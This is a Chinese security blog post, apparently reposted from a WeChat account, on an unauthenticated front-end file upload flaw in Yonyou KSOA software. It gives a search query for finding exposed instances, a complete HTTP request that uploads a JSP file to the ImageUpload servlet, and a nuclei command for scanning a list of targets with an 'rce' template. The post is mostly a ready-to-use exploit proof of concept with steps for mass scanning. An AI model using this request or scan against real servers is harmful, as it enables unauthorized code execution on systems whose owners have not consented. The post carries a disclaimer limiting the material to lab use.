用友时空KSOA软件前台文件上传漏洞 nuclei

admin
admin
admin
102340
文章
87
评论
2022年10月5日16:18:03评论1,433 views字数 1016阅读3分23秒阅读模式
用友时空KSOA软件前台文件上传漏洞 nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友时空KSOA软件前台文件上传漏洞 nuclei


文章简介


用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。



网络测绘

app="用友-时空KSOA"


复现过程

用友时空KSOA软件前台文件上传漏洞 nuclei

POST http://ip:port/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=111111.jsp&_ZQA_ID=d0d60ec54924481c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------122739796041499160471980406311Content-Length: 51Origin: nullConnection: closeUpgrade-Insecure-Requests: 1
<% out.println("bea86d66a5278f9e6fa1112d2e2f1"); %>


用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei




接下来就是漫长的信息收集阶段:





内网nuclei-pocs方法


nuclei -t yonyou_KSOA_ImageUpload_rce.yaml -l url.txt

公众号回复0931获取

用友时空KSOA软件前台文件上传漏洞 nuclei






用友时空KSOA软件前台文件上传漏洞 nuclei




用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei

用友时空KSOA软件前台文件上传漏洞 nuclei



原文始发于微信公众号(北极星sec):用友时空KSOA软件前台文件上传漏洞 nuclei

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日16:18:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友时空KSOA软件前台文件上传漏洞 nucleihttps://cn-sec.com/archives/1329088.html

发表评论

匿名网友 填写信息